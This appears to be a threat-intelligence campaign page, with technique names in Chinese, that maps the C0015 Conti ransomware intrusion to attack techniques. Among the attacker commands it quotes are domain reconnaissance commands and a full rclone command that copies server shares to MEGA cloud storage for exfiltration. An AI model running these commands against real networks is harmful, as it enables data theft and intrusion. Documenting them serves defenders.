1. Home
  2. Campaigns
  3. C0015

C0015

C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]

ID: C0015
First Seen:  August 2021 [1]
Last Seen:  August 2021 [1]
Contributors: Matt Brenton, Zurich Insurance Group
Version: 1.0
Created: 29 September 2022
Last Modified: 29 September 2022
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

During C0015, the threat actors used wmic and rundll32 to load Cobalt Strike onto a target host.[1]
Enterprise T1005 从本地系统获取数据

During C0015, the threat actors obtained files and data from the compromised network.[1]
Enterprise T1039 从网络共享驱动器获取数据

During C0015, the threat actors collected files from network shared drives prior to network encryption.[1]
Enterprise T1036 伪装

During C0015, the threat actors named a binary file compareForfor.jpg to disguise it as a JPG file.[1]
Enterprise T1059 .003 命令与脚本解释器: Windows Command Shell

During C0015, the threat actors used cmd.exe to execute commands and run malicious binaries.[1]
.005 命令与脚本解释器: Visual Basic

During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.[1]
.007 命令与脚本解释器: JavaScript

During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.[1]
Enterprise T1482 域信任发现

During C0015, the threat actors used the command nltest /domain_trusts /all_trusts to enumerate domain trusts.[1]
Enterprise T1030 数据传输大小限制

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.[1]

Enterprise T1074 .001 数据分段: Local Data Staging

During C0015, PowerView's file share enumeration results were stored in the file c:\ProgramData\found_shares.txt.[1]
Enterprise T1486 数据加密以实现影响

During C0015, the threat actors used Conti ransomware to encrypt a compromised network.[1]
Enterprise T1083 文件和目录发现

During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.[1]
Enterprise T1069 .001 权限组发现: Local Groups

During C0015, the threat actors used the command net localgroup "adminstrator" to identify accounts with local administrator rights.[1]
.002 权限组发现: Domain Groups

During C0015, the threat actors use the command net group "domain admins" /dom to enumerate domain groups.[1]
Enterprise T1570 横向工具传输

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.[1]
Enterprise T1027 混淆文件或信息

During C0015, the threat actors used Base64-encoded strings.[1]
Enterprise T1204 .002 用户执行: Malicious File

During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.[1]
Enterprise T1218 .005 系统二进制代理执行: Mshta

During C0015, the threat actors used mshta to execute DLLs.[1]
.010 系统二进制代理执行: Regsvr32

During C0015, the threat actors employed code that used regsvr32 for execution.[1]
.011 系统二进制代理执行: Rundll32

During C0015, the threat actors loaded DLLs via rundll32 using the svchost process.[1]
Enterprise T1124 系统时间发现

During C0015, the threat actors used the command net view /all time to gather the local time of a compromised network.[1]
Enterprise T1016 系统网络配置发现

During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.[1]

Enterprise T1135 网络共享发现

During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.[1]
Enterprise T1588 .001 获取能力: Malware

For C0015, the threat actors used Cobalt Strike and Conti ransomware.[1]

.002 获取能力: Tool

For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.[1]
Enterprise T1105 输入工具传输

During C0015, the threat actors downloaded additional tools and files onto a compromised network.[1]
Enterprise T1057 进程发现

During C0015, the threat actors used the tasklist /s command as well as taskmanager to obtain a list of running processes.[1]
Enterprise T1055 .001 进程注入: Dynamic-link Library Injection

During C0015, the threat actors used a DLL named D8B3.dll that was injected into the Winlogon process.[1]

Enterprise T1021 .001 远程服务: Remote Desktop Protocol

During C0015, the threat actors used RDP to access specific network hosts of interest.[1]
Enterprise T1018 远程系统发现

During C0015, the threat actors used the commands net view /all /domain and ping to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.[1]
Enterprise T1219 远程访问软件

During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.[1]
Enterprise T1567 .002 通过网络服务渗出: Exfiltration to Cloud Storage

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.[1]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.[1]
Enterprise T1553 .002 颠覆信任控制: Code Signing

For C0015, the threat actors used DLL files that had invalid certificates.[1]

Software

ID Name Description
S0552 AdFind

[1]
S0534 Bazar

[1]
S0154 Cobalt Strike

[1]
S0575 Conti

[1]
S1040 Rclone

[1]

References

  1. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.